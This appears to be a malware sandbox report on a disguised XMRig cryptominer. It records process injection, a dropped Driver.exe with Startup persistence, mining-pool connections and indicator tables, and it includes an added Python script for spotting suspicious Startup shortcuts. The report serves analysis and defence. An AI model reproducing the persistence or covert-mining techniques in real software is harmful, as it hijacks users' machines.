        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information (VolumeInformation) of:
    C:\Windows\Fonts\GLSNECB.TTF
    C:\Windows\Fonts\GIGI.TTF
    C:\Windows\Fonts\FRABK.TTF
    C:\Windows\Fonts\FRABKIT.TTF
    C:\Windows\Fonts\FORTE.TTF
    C:\Windows\Fonts\FELIXTI.TTF
    C:\Windows\Fonts\ERASMD.TTF
    C:\Windows\Fonts\ERASLGHT.TTF
    C:\Windows\Fonts\ERASDEMI.TTF
    C:\Windows\Fonts\ERASBD.TTF
    C:\Windows\Fonts\ENGR.TTF
    C:\Windows\Fonts\ELEPHNT.TTF
    C:\Windows\Fonts\ELEPHNTI.TTF
    C:\Windows\Fonts\ITCEDSCR.TTF
    C:\Windows\Fonts\CURLZ___.TTF
    C:\Windows\Fonts\COPRGTL.TTF
    C:\Windows\Fonts\COPRGTB.TTF
    C:\Windows\Fonts\CENSCBK.TTF
    C:\Windows\Fonts\SCHLBKI.TTF
    C:\Windows\Fonts\SCHLBKB.TTF
    C:\Windows\Fonts\SCHLBKBI.TTF
    C:\Windows\Fonts\CASTELAR.TTF
    C:\Windows\Fonts\CALIST.TTF
    C:\Windows\Fonts\CALISTI.TTF
    C:\Windows\Fonts\CALISTB.TTF
    C:\Windows\Fonts\CALISTBI.TTF
    C:\Windows\Fonts\BOOKOS.TTF
    C:\Windows\Fonts\BOOKOSB.TTF
    C:\Windows\Fonts\BOOKOSI.TTF
    C:\Windows\Fonts\BOOKOSBI.TTF
    C:\Windows\Fonts\BOD_R.TTF
    C:\Windows\Fonts\BOD_I.TTF
    C:\Windows\Fonts\BOD_B.TTF
    C:\Windows\Fonts\BOD_BI.TTF
    C:\Windows\Fonts\BOD_CR.TTF
    C:\Windows\Fonts\BOD_BLAR.TTF
    C:\Windows\Fonts\BOD_CI.TTF
    C:\Windows\Fonts\BOD_CB.TTF
    C:\Windows\Fonts\BOD_BLAI.TTF
    C:\Windows\Fonts\BOD_CBI.TTF
    C:\Windows\Fonts\ITCBLKAD.TTF
    C:\Windows\Fonts\ARLRDBD.TTF
    C:\Windows\Fonts\AGENCYR.TTF
    C:\Windows\Fonts\AGENCYB.TTF
    C:\Windows\Fonts\BSSYM7.TTF
    C:\Windows\Fonts\REFSAN.TTF
    C:\Windows\Fonts\REFSPCL.TTF
    C:\Windows\Fonts\MTEXTRA.TTF
    C:\Windows\Fonts\marlett.ttf
    C:\Windows\Fonts\micross.ttf
    C:\Windows\Fonts\timesi.ttf
    C:\Windows\Fonts\timesbd.ttf
    C:\Windows\Fonts\timesbi.ttf
    C:\Users\user\Desktop\Vsob3IooE7.exe
    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe | Queries volume information (VolumeInformation) of (each recorded twice):
    C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (numbers preceding a technique are the report's signature-count badges, reproduced as extracted):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | 21 Registry Run Keys / Startup Folder | 111 Process Injection | 1 Masquerading | 1 Input Capture | 21 Security Software Discovery | Remote Services | 1 Input Capture | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 21 Registry Run Keys / Startup Folder | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 21 Virtualization/Sandbox Evasion | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 111 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 1 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Timestomp | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
Behavior Graph ID: 873923 | Sample: Vsob3IooE7.exe | Start date: 23/05/2023 | Architecture: WINDOWS | Score: 100

Start (node 2)
    signatures: Sigma detected: Xmrig; Multi AV Scanner detection for submitted file; Yara detected AntiVM3; 6 other signatures
    started: Vsob3IooE7.exe (node 8, counters 3); Vsob3IooE7.exe (node 12, counters 2); Vsob3IooE7.exe (node 14); Vsob3IooE7.exe (node 16)
Vsob3IooE7.exe (node 8)
    dropped: C:\Users\user\AppData\...\Vsob3IooE7.exe.log (ASCII)
    signatures: Injects a PE file into a foreign processes
    started: Vsob3IooE7.exe (node 18, counters 1 4); Vsob3IooE7.exe (node 21); Vsob3IooE7.exe (node 23)
Vsob3IooE7.exe (node 18)
    dropped: C:\Users\user\AppData\Roaming\...\Driver.exe (MS-DOS); C:\Users\user\AppData\Roaming\...\Driver.url (MS)
    started: Driver.exe (node 25, counters 1)
Driver.exe (node 25)
    DNS/IP: pool-fr.supportxmr.com 141.94.96.144, remote port 3333, local port 49715, DFNVereinzurFoerderungeinesDeutschenForschungsnetzese, Germany (node 37); pool.supportxmr.com (node 39)
    signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    started: conhost.exe (node 29)
141.94.96.144 (node 37)
    signatures: Detected Stratum mining protocol
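The graph shows the second-stage process dropping Driver.exe together with Driver.url under AppData\Roaming, and the signature list records an entry in Start Menu\Programs\Startup. Below is an added Python example for triaging exactly that persistence pattern; it is not Joe Sandbox code and not code from the sample. The report does not reproduce the contents of Driver.url, so SAMPLE_URL_FILE is constructed to show the [InternetShortcut] form such a file takes; the function names, the USER_WRITABLE list and the Startup folder paths are my own choices.

```python
"""Triage of Startup-folder .url shortcuts that launch a local executable.

Added example for this report; it is not Joe Sandbox code and not the sample's
code. The report records Driver.url dropped beside Driver.exe under
C:\\Users\\user\\AppData\\Roaming\\Sysfiles and a Start Menu\\Programs\\Startup
entry, but not the shortcut's contents, so SAMPLE_URL_FILE below is constructed
to show the [InternetShortcut] layout such a file would need.
"""
from __future__ import annotations

import configparser
import ntpath
import os
import re
from urllib.parse import unquote, urlparse

# Locations a standard user can write to. A Startup entry that launches an
# executable from here is the pattern this report shows (AppData\Roaming).
USER_WRITABLE = [re.compile(p, re.I) for p in (
    r"^[a-z]:\\users\\[^\\]+\\appdata\\",
    r"^[a-z]:\\users\\[^\\]+\\downloads\\",
    r"^[a-z]:\\programdata\\",
    r"^[a-z]:\\windows\\temp\\",
)]
EXEC_EXT = {".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta"}

# Constructed contents; the real Driver.url is not reproduced in the report.
SAMPLE_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=file:///C:/Users/user/AppData/Roaming/Sysfiles/Driver.exe\n"
    "IconIndex=0\n"
)
BENIGN_URL_FILE = "[InternetShortcut]\nURL=https://example.test/\n"


def shortcut_target(url_text: str) -> str | None:
    """Return the local path an [InternetShortcut] file launches, or None when
    it points at a web URL (or has no URL= line)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(url_text.lstrip("\ufeff"))   # tolerate a UTF-8 BOM
    if not cp.has_option("InternetShortcut", "URL"):
        return None
    url = cp.get("InternetShortcut", "URL").strip()
    if re.match(r"^[a-z]:\\", url, re.I):
        return url                      # bare local path, accepted by the shell
    parsed = urlparse(url)
    if parsed.scheme != "file":
        return None
    path = parsed.path
    if re.match(r"^[a-z]:$", parsed.netloc, re.I):   # file://C:/... form
        path = parsed.netloc + path
    return unquote(path.lstrip("/")).replace("/", "\\")


def assess(url_text: str) -> dict:
    """Flag a shortcut that runs an executable from a user-writable directory."""
    target = shortcut_target(url_text)
    verdict = {"target": target, "suspicious": False, "reasons": []}
    if target is None:
        return verdict
    ext = ntpath.splitext(target)[1].lower()
    if ext in EXEC_EXT:
        verdict["reasons"].append(f"launches {ext} file")
    if any(p.match(target) for p in USER_WRITABLE):
        verdict["reasons"].append("target lives in a user-writable directory")
    verdict["suspicious"] = len(verdict["reasons"]) == 2
    return verdict


def scan_startup_folders() -> list[dict]:
    """Walk both Startup folders on a Windows host (returns [] elsewhere)."""
    folders = [
        os.path.join(os.environ.get("APPDATA", ""), r"Microsoft\Windows\Start Menu\Programs\Startup"),
        os.path.join(os.environ.get("ProgramData", ""), r"Microsoft\Windows\Start Menu\Programs\StartUp"),
    ]
    hits = []
    for folder in folders:
        if not os.path.isdir(folder):
            continue
        for name in os.listdir(folder):
            if not name.lower().endswith(".url"):
                continue
            full = os.path.join(folder, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                result = assess(fh.read())
            result["file"] = full
            hits.append(result)
    return hits


if __name__ == "__main__":
    print(assess(SAMPLE_URL_FILE))
    for hit in scan_startup_folders():
        print(hit)
```

An executable target alone is not flagged (vendors do ship Startup shortcuts into Program Files); the verdict requires both an executable extension and a user-writable location, which is the combination this analysis produced. A .lnk in the same folder needs a different parser, so this check covers only the InternetShortcut form the report shows.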

Source | Detection | Scanner | Label
Vsob3IooE7.exe | 22% | ReversingLabs |
Vsob3IooE7.exe | 24% | Virustotal |
Vsob3IooE7.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | 71% | ReversingLabs | Win64.Trojan.DisguisedXMRigMiner

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://www.jiyu-kobo.co.jp/://w | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/://w | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://)/cmd.cgi?cmd=REL | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.urwpp.de | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/icro | 0% | URL Reputation | safe
http://www.galapagosdesign.com/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/X | 0% | URL Reputation | safe
http://www.fontbureau.comF | 0% | URL Reputation | safe
http://www.urwpp.de9h | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.comwdth | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp/Zw | 0% | Avira URL Cloud | safe
http://www.ascendercorp.com/typedesigners.html( | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/Cw | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/hw | 0% | Avira URL Cloud | safe
http://www.fontbureau.comueTF | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.urwpp.deeg | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y0/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/r | 0% | URL Reputation | safe
http://www.monotype. | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/6w | 0% | Avira URL Cloud | safe
http://www.fontbureau.como | 0% | URL Reputation | safe
http://www.fontbureau.comalic | 0% | URL Reputation | safe
http://www.fontbureau.comue9 | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/(w | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/Zw | 0% | Avira URL Cloud | safe
http://192.168.100.115/cmd.cgi? | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/~w | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pool-fr.supportxmr.com | 141.94.96.144 | true | false | | high
pool.supportxmr.com | unknown | unknown | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
Most of these strings are font-vendor URLs from TrueType metadata (the sample enumerates C:\Windows\Fonts, see the volume-information queries above) and carry trailing garbage from memory-string extraction; the two cmd.cgi URLs are sourced from the Vsob3IooE7.exe file itself rather than a memory dump.
http://www.jiyu-kobo.co.jp/://w | Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com/designersG | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.sajatypeworks.comwdth | Vsob3IooE7.exe, 00000000.00000003.391553068.000000000627B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/hw | Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://)/cmd.cgi?cmd=REL | Vsob3IooE7.exe | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designers? | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/Cw | Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Vsob3IooE7.exe, 00000000.00000003.424132747.0000000006260000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.ascendercorp.com/typedesigners.html( | Vsob3IooE7.exe, 00000000.00000003.395584229.000000000626C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/jp/Zw | Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.de9h | Vsob3IooE7.exe, 00000000.00000003.396175898.000000000626C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.de | Vsob3IooE7.exe, 00000000.00000003.396175898.000000000626C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Vsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000006.00000002.448788250.0000000002E31000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/icro | Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/6w | Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395584229.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | Vsob3IooE7.exe, 00000000.00000003.396117342.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.396175898.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/ | Vsob3IooE7.exe, 00000000.00000003.397493268.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.397352751.000000000627A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/X | Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comF | Vsob3IooE7.exe, 00000000.00000003.396117342.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.396175898.000000000627A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/(w | Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comueTF | Vsob3IooE7.exe, 00000000.00000003.396117342.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.396175898.000000000627A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/jp/ | Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Zw | Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deeg | Vsob3IooE7.exe, 00000000.00000003.396175898.000000000626C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/ | Vsob3IooE7.exe, 00000000.00000003.394136612.0000000006265000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.394272189.000000000626A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://192.168.100.115/cmd.cgi? | Vsob3IooE7.exe | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/Y0/ | Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/r | Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395584229.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395007888.0000000006277000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.monotype. | Vsob3IooE7.exe, 00000000.00000003.397352751.000000000626C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | Vsob3IooE7.exe, 00000000.00000003.395007888.0000000006277000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
